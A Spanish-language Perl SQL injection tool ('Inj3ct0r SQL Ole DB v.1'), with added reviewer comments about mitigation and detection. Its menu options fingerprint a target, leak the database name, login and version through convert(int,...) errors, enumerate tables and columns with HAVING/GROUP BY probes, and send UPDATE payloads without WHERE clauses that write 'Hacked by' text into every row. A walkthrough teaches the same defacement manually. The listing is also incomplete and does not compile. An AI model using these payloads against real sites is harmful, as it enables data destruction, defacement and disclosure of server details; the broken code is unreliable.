# Inj3ct0r SQL Ole DB v.1
use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
# Entry routine: prints the banner with usage text when no argument is given,
# then prints the seven-item menu and dispatches on $opcion.
# NOTE(review): this listing is incomplete. The braces that delimit the
# blocks, the `menu` label targeted by `goto menu`, the read that fills
# $opcion and the bodies of the dispatch `if`s are not present, so the file
# does not compile as shown.
sub lw
# $^O is the operating-system name perl was built for.
my $SO = $^O;
# $linux is assigned here and never read in the visible code.
my $linux = "";
# Substring test: any OS name containing "win" matches, which includes
# "darwin" and "cygwin" as well as "MSWin32".
if (index(lc($SO),"win")!=-1){
# Constant strings passed to the shell; they set the console title and colour.
system ("title Inj3ct0r SQL Ole DB v.1 - By JosS");
system ("color 02");
#*************************** Usage ******************************
if (!$ARGV[0]) {
print "\t\t########################################################\n\n";
print "\t\t#    Inj3ct0r SQL Ole DB v.1 - Spanish Hackers Team    #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$year += 1900;
# localtime() returns a 0-based month; $mon is printed unadjusted, so the
# month shown is one less than the calendar month.
print "\t\t\t\t$mday/$mon/$year $hour:$min:$sec\n\n";
print "Usage: $0 [Host] \n";
print "\n\n";
print "EJ: $0 \n";
#*************************** Menu ******************************
print "\t\t########################################################\n\n";
print "\t\t#    Inj3ct0r SQL Ole DB v.1 - Spanish Hackers Team    #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$year += 1900;
print "\t\t\t\t$mday/$mon/$year $hour:$min:$sec\n\n";
print "Menu:\n";
print "\n";
print "1. Comprobar si la web se encuentra 0n\n";
print "2. Injectar codigo manualmente\n";
print "3. Injectar codigo automaticamente\n";
print "4. Informacion del server\n";
print "5. Manual Sql Injection\n";
print "6. Creditos\n";
print "7. Salir\n\n";
print "Opcion:";
# Numeric comparison: a non-numeric $opcion evaluates as 0 and is rejected.
if ($opcion!=1 && $opcion!=2 && $opcion!=3 && $opcion!=4 && $opcion!=5 && $opcion!=6 && $opcion!=7)
print "Opciуn Incorrecta\n";
goto menu;
# Dispatch on the menu choice; the statement each test guards is not present
# in this listing.
if ($opcion==1)
if ($opcion==2)
if ($opcion==3)
if ($opcion==4)
if ($opcion==5)
if ($opcion==6)
if ($opcion==7)
#*************************** Opcion1 ******************************
# Menu option 1: reachability check. Extracts the host name from $host and
# attempts a TCP connection to port 80, then reports the result.
# NOTE(review): block braces and the `else` between the two result messages
# are not present in this listing.
sub primero
print "\t\t########################################################\n\n";
print "\t\t#    Inj3ct0r SQL Ole DB v.1 - Spanish Hackers Team    #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$year += 1900;
print "\t\t\t\t$mday/$mon/$year $hour:$min:$sec\n\n";
# Matches only URLs that start with "http://" and contain a further "/" after
# the host part; for anything else $server stays undefined.
($server) = $host =~ m{http://(.*?)/};
print "Connect To ...: $server\n\n";
# A successful connect shows only that something accepts TCP connections on
# port 80; no HTTP request is sent here. The socket is not closed in the
# visible code.
$sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort => 80, Proto => "tcp");
if ($sock)
print "La web esta On\n\n";
print "La web esta 0ff\n\n";
print "Pulse la tecla Enter para volver al menu.";
goto menu;
#*************************** Opcion2 ******************************
# Menu option 2: manual probe loop. Takes a string in $comando, replaces its
# spaces with '+', appends it verbatim to $host and issues a GET; the reply is
# then searched for a database error message. The same sequence is repeated in
# a loop until $comando is 'exit'.
#
# Defender's view: this yields data only when the target application
# (a) concatenates the request parameter into its SQL text and (b) returns the
# raw provider error to the client. Parameterised queries remove (a); generic
# error pages remove (b).
# Detection: every probe is a plain GET with the payload in the URL, so it is
# recorded in the web server's access log. The LWP::UserAgent object is created
# without options, so requests carry the library's default User-Agent.
#
# NOTE(review): block braces and the reads that fill $comando are not present
# in this listing.
sub segundo
print "\t\t########################################################\n\n";
print "\t\t#    Inj3ct0r SQL Ole DB v.1 - Spanish Hackers Team    #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$year += 1900;
print "\t\t\t\t$mday/$mon/$year $hour:$min:$sec\n\n";
print "Escriba exit en comando si quiere terminar\n\n";
print "Victima: $host\n\n";
print "Comando: ";
chomp $comando;
$comando =~ s/ /+/g;
print "\n\n";
print "Comando injectado: $comando\n\n";
# The request URL is $host with the typed string appended unchanged.
my $final = $host.$comando;
print $final,"\n\n";
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
# as_string gives status line, headers and body, so the patterns below are
# applied to the complete response text.
$doc = $ua->request($req)->as_string;
# Looks for the word "Column" or "Columna" followed by text up to a closing
# </font> tag, i.e. an error message rendered inside an HTML error page.
# NOTE(review): the output label says "MySql", but the error wording matched
# here is the Microsoft OLE DB / SQL Server one quoted later in this file.
    if ( $doc =~ m/\bColumna?\b(.*?)\<\/font>/mosix ) {
        print "MySql dice:  - $1\n\n";
# First single-quoted 'word.word' pair in the response is taken as
# table and column name.
      ($tabla, $columna) = $doc =~ m/\'(\w+)\.(\w+)\'/simo;
       print "tabla: $tabla\n";
       print "Columna: $columna\n\n";
    else {
        print "El comando no se ejecuto con exito\n\n";
# Same prompt / request / parse sequence as above, repeated until the typed
# string is 'exit'.
while ($comando ne 'exit')
print "Escriba exit en comando si quiere terminar\n\n";
print "Victima: $host\n\n";
print "Comando: ";
chomp $comando;
$comando =~ s/ /+/g;
print "\n\n";
print "Comando injectado: $comando\n\n";
my $final = $host.$comando;
print $final,"\n";
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
    if ( $doc =~ m/\bColumna?\b(.*?)\<\/font>/mosix ) {
        print "MySql dice:  - $1\n\n";
      ($tabla, $columna) = $doc =~ m/\'(\w+)\.(\w+)\'/simo;
       print "tabla: $tabla\n";
       print "Columna: $columna\n\n";
    else {
        print "El comando no se ejecuto con exito\n\n";
print "Pulse la tecla Enter para volver al menu.";
goto menu;
#*************************** Opcion3 ******************************
# Menu option 3: automated sequence. For each of three probe strings it
# provokes a "Column '<table>.<column>' is invalid in the select list ..."
# style error to learn a table and column name (phase one), then repeats the
# probe with the known columns in a GROUP BY list to learn further columns
# (phases two and three). After each discovery it sends UPDATE statements that
# write an HTML string containing $nick into the discovered column.
#
# Impact: the UPDATE statements carry no WHERE clause, so a statement that is
# executed overwrites that column in every row of the table; recovery then
# means restoring the data from backup.
# Mitigation: parameterised queries in the application; a database login for
# the web application that has no UPDATE right on tables it only reads; error
# pages that do not echo provider messages.
# Detection: request URLs containing "having 1=1", "group by ... having 1=1"
# or "update ... set" are recorded in the access log, since all requests here
# are GETs.
#
# NOTE(review): block braces and the read that fills $nick are not present in
# this listing.
sub tercero
print "\t\t########################################################\n\n";
print "\t\t#    Inj3ct0r SQL Ole DB v.1 - Spanish Hackers Team    #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$year += 1900;
print "\t\t\t\t$mday/$mon/$year $hour:$min:$sec\n\n";
# Column names learned from the error messages, in order of discovery.
my @columna;
print "Victima: $host\n\n";
print "Introduce tu Nick: ";
chomp $nick;
# Three variants of the same probe, differing only in the prefix.
@comando=("1 having 1=1--","' having 1=1--","--' having 1=1--");
$comando =~ s/ /+/g;
print "\n\n";
for ($i=0;$i<=2;$i++)
my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
print "\t\t-----Primera Fase-----\n\n\n\n";
print "Comando injectado: $comando[$i]\n\n\n\n";
## Phase one ##
# Same error-page test and 'table.column' extraction as in option 2.
if ( $doc =~ m/\bColumna?\b(.*?)\<\/font>/mosix ) {
      ($tabla, $columna) = $doc =~ m/\'(\w+)\.(\w+)\'/simo;
           push @columna, $columna;
       print "tabla: $tabla\n";
       print "Columna: $columna\n\n";
# Table and column names taken from the response are interpolated into
# UPDATE statements; @comando is reassigned while the outer loop is still
# indexing it.
      @comando=("' update $tabla set $columna[0]='<h1>Hacked by $nick'--","1 update $tabla set $columna[0]='<h1>Hacked by $nick'--","--'update $tabla set $columna[0]='<h1>Hacked by $nick'--");
      for ($i=0;$i<=2;$i++)
my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
print "Comando injectado: $comando[$i]\n\n";
## Phase two ##
print "\t\t-----Segunda Fase-----\n\n\n\n";
     @comando=("1 group by $columna[0] having 1=1--","' group by $columna[0] having 1=1--","--' group by $columna[0] having 1=1--");
      for ($i=0;$i<=2;$i++)
my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
print "Comando injectado: $comando[$i]\n\n";
if ( $doc =~ m/\bColumna?\b(.*?)\<\/font>/mosix ) {
($tabla, $columna) = $doc =~ m/\'(\w+)\.(\w+)\'/simo;
           push @columna, $columna;
       print "tabla: $tabla\n";
       print "Columna: $columna\n\n";
@comando=("' update $tabla set $columna[1]='<h1>Hacked by $nick'--","1 update $tabla set $columna[1]='<h1>Hacked by $nick'--","--'update $tabla set $columna[1]='<h1>Hacked by $nick'--");
 for ($i=0;$i<=2;$i++)
my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
print "Comando injectado: $comando[$i]\n\n";
## Phase three ##
print "\t\t-----Tercera Fase-----\n\n\n\n";
@comando=("1 group by $columna[0],$columna[1] having 1=1--","' group by $columna[0],$columna[1] having 1=1--","--' group by $columna[0],$columna[1] having 1=1--");
for ($i=0;$i<=2;$i++)
my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
print "Comando injectado: $comando[$i]\n\n";
if ( $doc =~ m/\bColumna?\b(.*?)\<\/font>/mosix ) {
($tabla, $columna) = $doc =~ m/\'(\w+)\.(\w+)\'/simo;
           push @columna, $columna;
       print "tabla: $tabla\n";
       print "Columna: $columna\n\n";
@comando=("' update $tabla set $columna[2]='<h1>Hacked by $nick'--","1 update $tabla set $columna[2]='<h1>Hacked by $nick'--","--'update $tabla set $columna[2]='<h1>Hacked by $nick'--");
for ($i=0;$i<=2;$i++)
my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
print "Comando injectado: $comando[$i]\n\n";
 } # end of if
    else {
        print "El comando no se ejecuto con exito\n\n";
} # end of outer for
print "Pulse la tecla Enter para volver al menu.";
goto menu;
} ## end of sub
#*************************** Opcion4 ******************************
# Menu option 4: server information. Sends four requests built from
# @comando[0..3] and, when the response contains a "Syntax ... </font>" error,
# prints the value quoted in that error as database name, login, server name or
# version, depending on which entry was sent.
#
# Defender's view: the values come out of a type-conversion error message that
# the application echoes to the client ("... value '<data>' to ..."). An
# application that returns a generic error page discloses none of them, and
# parameterised queries keep the expression from reaching the database at all.
# Detection: "convert(int," together with db_name(), system_user, @@servername
# or @@version in a request URL.
#
# NOTE(review): block braces and the assignment of @comando for this option are
# not present in this listing; the string comparisons below show the values the
# entries are expected to hold.
sub cuarto
print "\t\t########################################################\n\n";
print "\t\t#    Inj3ct0r SQL Ole DB v.1 - Spanish Hackers Team    #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$year += 1900;
print "\t\t\t\t$mday/$mon/$year $hour:$min:$sec\n\n";
print "Victima: $host\n\n";
for ($i=0;$i<=3;$i++)
my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
# Proceed only when the response carries an error containing "Syntax" up to a
# closing </font> tag.
if ( $doc =~ /Syntax\s(.*)<\/font>/mosix )
if ($comando[$i] eq "1+and+1=convert(int,db_name())")
print "db_name:\n";
# Captures the text between "value '" and "' to" in the error message.
$dbname = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$dbname\n\n";
if ($comando[$i] eq "1+and+1=convert(int,system_user)")
print "system_user:\n";
$systemuser = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$systemuser\n\n";
if ($comando[$i] eq "1+and+1=convert(int,\@\@servername)--")
print "servername:\n";
$servername = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$servername\n\n";
if ($comando[$i] eq '1+and+1=convert(int,@@version)--')
print "version:\n";
# /s lets the capture span line breaks and the quantifiers are non-greedy,
# unlike the three patterns above.
$version = $1 if ($doc =~ /.*?value\s'(.*?)'\sto.*/sm);
print "$version\n\n";
} # end of outer if
} # end of for
print "Pulse la tecla Enter para volver al menu.";
goto menu;
#*************************** Opcion5 ******************************
# Menu option 5: prints the banner followed by a Spanish-language walkthrough
# of the technique that options 2 and 3 automate: table and column names are
# read out of "Microsoft OLE DB Provider for SQL Server" error pages produced
# by HAVING / GROUP BY clauses, and the walkthrough ends with an UPDATE that
# overwrites a column.
#
# Defender's view: each error sample quoted below contains the provider error
# code, a 'table.column' name and the path and line number of the .asp script.
# All three reach the client only because the application returns the raw
# provider error; a generic error page withholds them, and parameterised
# queries keep the appended clause from being parsed as SQL.
#
# NOTE(review): the walkthrough text appears here without a print statement or
# here-document delimiters, and block braces are absent; presumably they were
# lost when this listing was extracted.
sub quinto
print "\t\t########################################################\n\n";
print "\t\t#    Inj3ct0r SQL Ole DB v.1 - Spanish Hackers Team    #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$year += 1900;
print "\t\t\t\t$mday/$mon/$year $hour:$min:$sec\n\n";
    (Microsoft OLE DB)
Para sacar las tablas y columnas, tenemos que ejecutar este comando:
' having 1=1--
Y como resultado tendremos algo como esto:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'F_CTexto_1.CTe_Titulo' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/visualizaciones/ctexto.asp, line 17
Bien, pues la tabla y la columna son estas:
Tabla: F_CTexto_1
Columna: CTe_Titulo
A partir de la columna podemos sacar el resto de columnas que se encuentran en la tabla. Mediante este comando:
' group by columna having 1=1--
' group by CTe_Titulo having 1=1--
Y obtenemos:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'F_CTexto_1.IdCTexto' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/visualizaciones/ctexto.asp, line 17
Entonces ya tenemos otra columna: IdCTexto. Podemos ir sacando mas de esta forma:
' group by Cte_Titulo,IdCTexto having 1=1--
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'F_CTexto_1.CTe_Descripcion' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/visualizaciones/ctexto.asp, line 17
Y asi sucesivamente vamos consigiendo las columnas. Una vez que tenemos todas las columnas, les hacemos un update para colocar nuestro propio texto y asi defacearla.
' update tabla set columna='HACKED BY JOSS'--
' update F_CTexto_1 set CTe_Descripcion='HACKED BY JOSS'--
Escrito por JosS
print "Pulse la tecla Enter para volver al menu.";
goto menu;
#*************************** Opcion6 ******************************
# Menu option 6: prints the banner and the credits (programmer, collaborators,
# greetings), then returns to the menu. No network activity.
# NOTE(review): block braces and the `menu` label are not present in this
# listing.
sub sexto
print "\t\t########################################################\n\n";
print "\t\t#    Inj3ct0r SQL Ole DB v.1 - Spanish Hackers Team    #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$year += 1900;
print "\t\t\t\t$mday/$mon/$year $hour:$min:$sec\n\n";
print " Programador: Jose Luis Gongora Fernandez (JosS)\n\n";
print " Colaboradores: phnx & explorer & kidd \n\n";
print " Greetz To: All Hackers\n\n";
print "Pulse la tecla Enter para volver al menu.";
goto menu;
#*************************** Opcion7 ******************************
sub setimo

